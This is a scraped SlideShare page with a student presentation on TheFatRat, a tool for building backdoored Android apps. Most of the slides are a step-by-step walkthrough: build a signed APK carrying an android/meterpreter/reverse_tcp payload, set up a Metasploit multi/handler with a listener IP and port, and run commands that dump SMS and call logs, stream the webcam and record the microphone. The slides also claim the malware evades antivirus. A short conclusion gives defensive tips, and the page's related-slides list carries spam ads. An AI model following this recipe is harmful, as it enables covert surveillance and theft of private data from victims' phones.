SlideShare una empresa de Scribd logo
1 de 22
TheFatRat
Guide InCharge,
Mr.AjithGS
Presented By,
AjilSunny
MCA LE-S3
Roll No.:01
CONTENTS
 Introduction
• Kali Linux
• Penetration testing
 TheFatRat
• Introduction to TheFatRat
• Advantages & Disadvantages
 Steps to Hacking Android with TheFatRat
• Payload File Creation
• Sending payload Tothe Target
• Commands to exploits victim’s windows
 Conclusion
 References
INTRODUCTION ONKALI LINUX
• Debian-basedLinuxdistributionaimedat advanced
PenetrationTestingandSecurityAuditing.
• ReleaseDate:March13th, 2013.
• Security-focusedversionof Linuxthat offers a large number
of toolsto seekoutweaknessesandsecure your network.
• Kalicontainsseveraltools
• Informationsecurity tasks
• PenetrationTesting,Securityresearch
• ComputerForensicsandReverseEngineering
• Developers:Mati Aharoni,DevonKearnsand Raphael
Hertzogof offensive security.
• Open source
• 600penetrationtestingtools+ Applications
• Platforms- x86, x86-64, armel
• LatestRelease–Kali 2017.3–21stNovember,2017
• Easyupgrade tofutureversions
• Also called pentesting
• Testinga computer system/network /Webapplication to find
vulnerabilities.
Benefits:
• Intelligently managevulnerabilities
• Avoid thecost of networkdowntime
• Meet regulatory requirements
• Preservecorporate image and customerloyalty
Penetration Testing
MAIN TERMS
• EXPLOIT-a pieceof codewritten to take advantage of a
particular vulnerability inthe system.
• PAYLOAD-simplescriptsthat thehackersutilize to interact witha
hacked system.
• LHOST- TheIPaddressyouwantyourlistener to bind to.
• LPORT- Theport youwantyourlistenerto bind to.
• Meterpreter- advanced,dynamically extensiblepayload thatusesin
memorydll injection& extended overthen/w at runtime.
TheFatRat
• The FatRat a massive exploiting tool
• Easy tool to generate backdoor
• Create backdoor for android, windows and linux
• Author:EdoMaland
• Versions:1.9.6.
TheFatRat
• This tool compiles a malware with popular payload and then the
compiled malware can be execute on Android, Windows, Linux.
• The malware that created with this tool also have an ability to
bypass most AV software
• With the help of msfconsole we can access all files in the victim
device
Advantages
• Open source
• Frequently updated
• Easyto deploy userspecific exploit
Disadvantages
• Can crashyoursystemifnot used wisely
• Requiresdeep knowledge forexploitdevelopment
STEPSFORHACKINGANDROID DEVICE
STEP1: FatRat Downloading and installation
The Downloading process is simply git clone.
git clone https://github.com/Screetsec/TheFatRat.git
STEP 2: List the folder TheFatRat it contains a file fatrat. Then
Execute the fatrat
 #fatrat
STEP 3: Create a backdoor with msfvenom.
STEP 4: Select the SIGNED ANDROID>> FatRat.apk
Set the Host IP address and the port number.
STEP 5: Enter a base name for output file.
Then Select android/meterpreter/reverse_tcp
The payload apk is created, and it is located in
/root /Desktop/TheFatRat /backdoored /hack.apk
STEP 6: Install a Main Activity App on your
Android phone
STEP 7: Set the multi/handler
Payload Handleris a module thatprovidesallthefeaturesof
themetasploitpayload systemtoexploit.
• msf > useexploit/multi/handler
STEP 8: Set the payload
• msf exploit(multi/handler) > set payload
android/meterpreter/reverse_tcp
STEP 9: Set the Local Host
The IP address you want your listener to bind to
• msf exploit(handler) > set LHOST 192.168.43.136
STEP 10: Set the Local Port
• msf exploit(handler) > set LPORT 4444
We can now interact with the victim & perform different
commands.
STEP 9: enter the command ‘Exploit’
Commands to Exploits Android
Device
 webcam_snap - Take a snap shot.
 webcam_stream- Play a video stream.
 webcam_list - List the camera types in the device .
 check_root- The device is rooted or not.
 dump_calllog- View the call details.
 dump_sms –To retrieve messages from victim’s phone.
 set_audio_mode –Set the android device in silent to ringing
mode.
 send_sms –Send message from victim’s to another.
 record_mic-Record audio from victim’s phone using mic
 sysinfo-Retrieve OS version of victim’s phone
CONCLUSION
• Keep your Android up to date.
• Installing antivirus software on your Android device.
• Never permanently enable installing of Apps from “Unknown
sources “.
• Never take your phone to important meetings or anywhere you
don't want people listening.
The backdoor application when installed and turned on the system
allows attacker to read, write and modify data. Cautions are:
REFERENCE
• https://github.com/Screetsec/TheFatRat
• https://www.youtube.com/watch?v=yUuwnu-NUXE
• https://github.com/Screetsec/TheFatRat
• https://www.youtube.com/watch?v=7PMfPbrM0o4
• https://bestsecuritysearch.com/fat-rat-malware-generation-
utility/

Más contenido relacionado

La actualidad más candente

Metasploit framework in Network Security
Metasploit framework in Network SecurityMetasploit framework in Network Security
Metasploit framework in Network SecurityAshok Reddy Medikonda
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentTeymur Kheirkhabarov
 
Nmap Hacking Guide
Nmap Hacking GuideNmap Hacking Guide
Nmap Hacking GuideAryan G
 
Lecture 8 increment_and_decrement_operators
Lecture 8 increment_and_decrement_operatorsLecture 8 increment_and_decrement_operators
Lecture 8 increment_and_decrement_operatorseShikshak
 
Nmap(network mapping)
Nmap(network mapping)Nmap(network mapping)
Nmap(network mapping)shwetha mk
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with SplunkSplunk
 
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced Actors
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced ActorsMemory Forensics for IR - Leveraging Volatility to Hunt Advanced Actors
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced ActorsJared Greenhill
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
Network scanning
Network scanningNetwork scanning
Network scanningoceanofwebs
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onSplunk
 
Nmap basics
Nmap basicsNmap basics
Nmap basicsitmind4u
 
What Is Spyware?
What Is Spyware?What Is Spyware?
What Is Spyware?Lookout
 
Introduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitIntroduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitRaghav Bisht
 

La actualidad más candente (20)

Metasploit framework in Network Security
Metasploit framework in Network SecurityMetasploit framework in Network Security
Metasploit framework in Network Security
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows Environment
 
Nmap Hacking Guide
Nmap Hacking GuideNmap Hacking Guide
Nmap Hacking Guide
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with Metasploit
 
Understanding NMAP
Understanding NMAPUnderstanding NMAP
Understanding NMAP
 
Lecture 8 increment_and_decrement_operators
Lecture 8 increment_and_decrement_operatorsLecture 8 increment_and_decrement_operators
Lecture 8 increment_and_decrement_operators
 
NMAP
NMAPNMAP
NMAP
 
Nmap(network mapping)
Nmap(network mapping)Nmap(network mapping)
Nmap(network mapping)
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with Splunk
 
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced Actors
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced ActorsMemory Forensics for IR - Leveraging Volatility to Hunt Advanced Actors
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced Actors
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
 
Network scanning
Network scanningNetwork scanning
Network scanning
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-on
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
 
Nmap
NmapNmap
Nmap
 
What Is Spyware?
What Is Spyware?What Is Spyware?
What Is Spyware?
 
Introduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitIntroduction To Exploitation & Metasploit
Introduction To Exploitation & Metasploit
 
Exception handling in python
Exception handling in pythonException handling in python
Exception handling in python
 

Similar a The FatRat

OSX Pirrit : Why you should care about malicious mac adware
OSX Pirrit : Why you should care about malicious mac adwareOSX Pirrit : Why you should care about malicious mac adware
OSX Pirrit : Why you should care about malicious mac adwarePriyanka Aash
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCanSecWest
 
FIWARE Primer - Learn FIWARE in 60 Minutes
FIWARE Primer - Learn FIWARE in 60 MinutesFIWARE Primer - Learn FIWARE in 60 Minutes
FIWARE Primer - Learn FIWARE in 60 MinutesFederico Michele Facca
 
Federico Michele Facca - FIWARE Primer - Learn FIWARE in 60 Minutes
Federico Michele Facca - FIWARE Primer - Learn FIWARE in 60 MinutesFederico Michele Facca - FIWARE Primer - Learn FIWARE in 60 Minutes
Federico Michele Facca - FIWARE Primer - Learn FIWARE in 60 MinutesCodemotion
 
PRESENTATION of CEH Tools.pptx
PRESENTATION of CEH Tools.pptxPRESENTATION of CEH Tools.pptx
PRESENTATION of CEH Tools.pptxAadityaSaxena12
 
Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...B.A.
 
Hacking your Droid (Aditya Gupta)
Hacking your Droid (Aditya Gupta)Hacking your Droid (Aditya Gupta)
Hacking your Droid (Aditya Gupta)ClubHack
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliPriyanka Aash
 
Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.
Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.
Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.Rahul Sasi
 
DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101dc612
 
Lifnaaaaaa e
Lifnaaaaaa eLifnaaaaaa e
Lifnaaaaaa ehenelpj
 
Chapter 7 security tools i
Chapter 7   security tools iChapter 7   security tools i
Chapter 7 security tools iSyaiful Ahdan
 
Docker at and with SignalFx
Docker at and with SignalFxDocker at and with SignalFx
Docker at and with SignalFxSignalFx
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
 
Boot-To-Root KIOPTRIX Level -1
Boot-To-Root KIOPTRIX Level -1Boot-To-Root KIOPTRIX Level -1
Boot-To-Root KIOPTRIX Level -1Venkat Raman
 
Using hypervisor and container technology to increase datacenter security pos...
Using hypervisor and container technology to increase datacenter security pos...Using hypervisor and container technology to increase datacenter security pos...
Using hypervisor and container technology to increase datacenter security pos...Tim Mackey
 
Using hypervisor and container technology to increase datacenter security pos...
Using hypervisor and container technology to increase datacenter security pos...Using hypervisor and container technology to increase datacenter security pos...
Using hypervisor and container technology to increase datacenter security pos...Black Duck by Synopsys
 

Similar a The FatRat (20)

OSX Pirrit : Why you should care about malicious mac adware
OSX Pirrit : Why you should care about malicious mac adwareOSX Pirrit : Why you should care about malicious mac adware
OSX Pirrit : Why you should care about malicious mac adware
 
App armor structure
App armor structureApp armor structure
App armor structure
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
 
FIWARE Primer - Learn FIWARE in 60 Minutes
FIWARE Primer - Learn FIWARE in 60 MinutesFIWARE Primer - Learn FIWARE in 60 Minutes
FIWARE Primer - Learn FIWARE in 60 Minutes
 
Federico Michele Facca - FIWARE Primer - Learn FIWARE in 60 Minutes
Federico Michele Facca - FIWARE Primer - Learn FIWARE in 60 MinutesFederico Michele Facca - FIWARE Primer - Learn FIWARE in 60 Minutes
Federico Michele Facca - FIWARE Primer - Learn FIWARE in 60 Minutes
 
Breach and attack simulation tools
Breach and attack simulation toolsBreach and attack simulation tools
Breach and attack simulation tools
 
G3t R00t at IUT
G3t R00t at IUTG3t R00t at IUT
G3t R00t at IUT
 
PRESENTATION of CEH Tools.pptx
PRESENTATION of CEH Tools.pptxPRESENTATION of CEH Tools.pptx
PRESENTATION of CEH Tools.pptx
 
Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...
 
Hacking your Droid (Aditya Gupta)
Hacking your Droid (Aditya Gupta)Hacking your Droid (Aditya Gupta)
Hacking your Droid (Aditya Gupta)
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
 
Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.
Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.
Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.
 
DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101
 
Lifnaaaaaa e
Lifnaaaaaa eLifnaaaaaa e
Lifnaaaaaa e
 
Chapter 7 security tools i
Chapter 7   security tools iChapter 7   security tools i
Chapter 7 security tools i
 
Docker at and with SignalFx
Docker at and with SignalFxDocker at and with SignalFx
Docker at and with SignalFx
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
 
Boot-To-Root KIOPTRIX Level -1
Boot-To-Root KIOPTRIX Level -1Boot-To-Root KIOPTRIX Level -1
Boot-To-Root KIOPTRIX Level -1
 
Using hypervisor and container technology to increase datacenter security pos...
Using hypervisor and container technology to increase datacenter security pos...Using hypervisor and container technology to increase datacenter security pos...
Using hypervisor and container technology to increase datacenter security pos...
 
Using hypervisor and container technology to increase datacenter security pos...
Using hypervisor and container technology to increase datacenter security pos...Using hypervisor and container technology to increase datacenter security pos...
Using hypervisor and container technology to increase datacenter security pos...
 

Último

Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Angeliki Cooney
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDropbox
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsNanddeep Nachan
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdfSandro Moreira
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesrafiqahmad00786416
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...apidays
 
Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityPlatformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityWSO2
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native ApplicationsWSO2
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...DianaGray10
 
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelMcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelDeepika Singh
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024The Digital Insurer
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistandanishmna97
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Zilliz
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Jeffrey Haguewood
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingEdi Saputra
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 

Último (20)

+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityPlatformless Horizons for Digital Adaptability
Platformless Horizons for Digital Adaptability
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelMcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 

The FatRat

  • 2. CONTENTS  Introduction • Kali Linux • Penetration testing  TheFatRat • Introduction to TheFatRat • Advantages & Disadvantages  Steps to Hacking Android with TheFatRat • Payload File Creation • Sending payload Tothe Target • Commands to exploits victim’s windows  Conclusion  References
  • 3. INTRODUCTION ONKALI LINUX • Debian-basedLinuxdistributionaimedat advanced PenetrationTestingandSecurityAuditing. • ReleaseDate:March13th, 2013. • Security-focusedversionof Linuxthat offers a large number of toolsto seekoutweaknessesandsecure your network. • Kalicontainsseveraltools • Informationsecurity tasks • PenetrationTesting,Securityresearch • ComputerForensicsandReverseEngineering
  • 4. • Developers:Mati Aharoni,DevonKearnsand Raphael Hertzogof offensive security. • Open source • 600penetrationtestingtools+ Applications • Platforms- x86, x86-64, armel • LatestRelease–Kali 2017.3–21stNovember,2017 • Easyupgrade tofutureversions
  • 5. • Also called pentesting • Testinga computer system/network /Webapplication to find vulnerabilities. Benefits: • Intelligently managevulnerabilities • Avoid thecost of networkdowntime • Meet regulatory requirements • Preservecorporate image and customerloyalty Penetration Testing
  • 6. MAIN TERMS • EXPLOIT-a pieceof codewritten to take advantage of a particular vulnerability inthe system. • PAYLOAD-simplescriptsthat thehackersutilize to interact witha hacked system. • LHOST- TheIPaddressyouwantyourlistener to bind to. • LPORT- Theport youwantyourlistenerto bind to. • Meterpreter- advanced,dynamically extensiblepayload thatusesin memorydll injection& extended overthen/w at runtime.
  • 7. TheFatRat • The FatRat a massive exploiting tool • Easy tool to generate backdoor • Create backdoor for android, windows and linux • Author:EdoMaland • Versions:1.9.6.
  • 8. TheFatRat • This tool compiles a malware with popular payload and then the compiled malware can be execute on Android, Windows, Linux. • The malware that created with this tool also have an ability to bypass most AV software • With the help of msfconsole we can access all files in the victim device
  • 9. Advantages • Open source • Frequently updated • Easyto deploy userspecific exploit Disadvantages • Can crashyoursystemifnot used wisely • Requiresdeep knowledge forexploitdevelopment
  • 10. STEPSFORHACKINGANDROID DEVICE STEP1: FatRat Downloading and installation The Downloading process is simply git clone. git clone https://github.com/Screetsec/TheFatRat.git
  • 11. STEP 2: List the folder TheFatRat it contains a file fatrat. Then Execute the fatrat  #fatrat
  • 12. STEP 3: Create a backdoor with msfvenom.
  • 13. STEP 4: Select the SIGNED ANDROID>> FatRat.apk Set the Host IP address and the port number.
  • 14. STEP 5: Enter a base name for output file. Then Select android/meterpreter/reverse_tcp
  • 15. The payload apk is created, and it is located in /root /Desktop/TheFatRat /backdoored /hack.apk
  • 16. STEP 6: Install a Main Activity App on your Android phone
  • 17. STEP 7: Set the multi/handler Payload Handleris a module thatprovidesallthefeaturesof themetasploitpayload systemtoexploit. • msf > useexploit/multi/handler STEP 8: Set the payload • msf exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
  • 18. STEP 9: Set the Local Host The IP address you want your listener to bind to • msf exploit(handler) > set LHOST 192.168.43.136 STEP 10: Set the Local Port • msf exploit(handler) > set LPORT 4444
  • 19. We can now interact with the victim & perform different commands. STEP 9: enter the command ‘Exploit’
  • 20. Commands to Exploits Android Device  webcam_snap - Take a snap shot.  webcam_stream- Play a video stream.  webcam_list - List the camera types in the device .  check_root- The device is rooted or not.  dump_calllog- View the call details.  dump_sms –To retrieve messages from victim’s phone.  set_audio_mode –Set the android device in silent to ringing mode.  send_sms –Send message from victim’s to another.  record_mic-Record audio from victim’s phone using mic  sysinfo-Retrieve OS version of victim’s phone
  • 21. CONCLUSION • Keep your Android up to date. • Installing antivirus software on your Android device. • Never permanently enable installing of Apps from “Unknown sources “. • Never take your phone to important meetings or anywhere you don't want people listening. The backdoor application when installed and turned on the system allows attacker to read, write and modify data. Cautions are:
  • 22. REFERENCE • https://github.com/Screetsec/TheFatRat • https://www.youtube.com/watch?v=yUuwnu-NUXE • https://github.com/Screetsec/TheFatRat • https://www.youtube.com/watch?v=7PMfPbrM0o4 • https://bestsecuritysearch.com/fat-rat-malware-generation- utility/